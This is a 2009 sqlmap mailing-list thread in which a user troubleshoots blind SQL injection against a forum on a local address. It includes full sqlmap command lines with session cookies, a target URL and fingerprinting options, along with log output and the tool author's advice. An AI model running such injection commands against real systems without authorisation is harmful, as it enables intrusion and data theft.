Re: [sqlmap-users] Blind injection possible - no output
From: Erik N. <da...@gm...> - 2009-09-17 17:34:39
Thank you for your answer; unfortunately, it didn't help me.
I tried to force the back-end DBMS into a number of different variations.
I also double-checked that the string isn't present when using AND 1=2.
Using --fingerprint gave me no output either. This is what I got from that run:
[19:28:54] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[19:28:54] [INFO] testing connection to the target url
[19:28:58] [INFO] testing if the provided string is within the target URL page content
[19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
[19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[19:29:04] [INFO] testing for parenthesis on injectable parameter
[19:29:07] [INFO] the injectable parameter requires 0 parenthesis
[19:29:07] [INFO] the back-end DBMS is MySQL
[19:29:07] [INFO] testing MySQL
[19:29:13] [INFO] confirming MySQL
[19:29:17] [INFO] retrieved:
[19:29:25] [INFO] the back-end DBMS is MySQL
[19:29:25] [INFO] retrieved:
[19:29:34] [INFO] retrieved:
[19:29:43] [INFO] retrieved:
[19:29:49] [INFO] retrieved:
[19:29:59] [INFO] retrieved:
[19:30:06] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75
[*] shutting down at: 19:32:09
On Thu, Sep 17, 2009 at 6:52 PM, Bernardo Damele A. G.
<ber...@gm...> wrote:
> Hi Erik,
>
> Try to force the back-end database software and version manually if
> you know it, e.g. --dbms "mysql 5" and double check that the provided
> string to match on is not present within any False response (e.g. AND
> 1=2).
>
> Cheers,
> Bernardo
>
>
> On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote:
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --fingerprint
>>
>> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
>> [14:09:04] [INFO] testing for parenthesis on injectable parameter
>> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis
>> [14:09:06] [INFO] testing MySQL
>> [14:09:07] [INFO] confirming MySQL
>> [14:09:08] [INFO] retrieved:
>> [14:09:10] [INFO] the back-end DBMS is MySQL
>> [14:09:10] [INFO] retrieved:
>> [14:11:28] [INFO] retrieved:
>> [14:11:32] [INFO] retrieved:
>> [14:11:35] [INFO] retrieved:
>> [14:11:41] [INFO] retrieved:
>> [14:11:46] [INFO] executing MySQL comment injection fingerprint
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: active fingerprint: MySQL < 3.22.11
>> comment injection fingerprint: MySQL 5.0.75
>>
>>
>> [*] shutting down at: 14:12:50
>>
>>
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --current-db
>>
>> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
>> [14:14:01] [INFO] testing for parenthesis on injectable parameter
>> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis
>> [14:14:03] [INFO] testing MySQL
>> [14:14:04] [INFO] confirming MySQL
>> [14:14:05] [INFO] retrieved:
>> [14:14:07] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: MySQL < 5.0.0
>>
>> [14:14:07] [INFO] fetching current database
>> [14:14:07] [INFO] retrieved:
>> current database: None
>>
>>
>> What to do?
>>
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>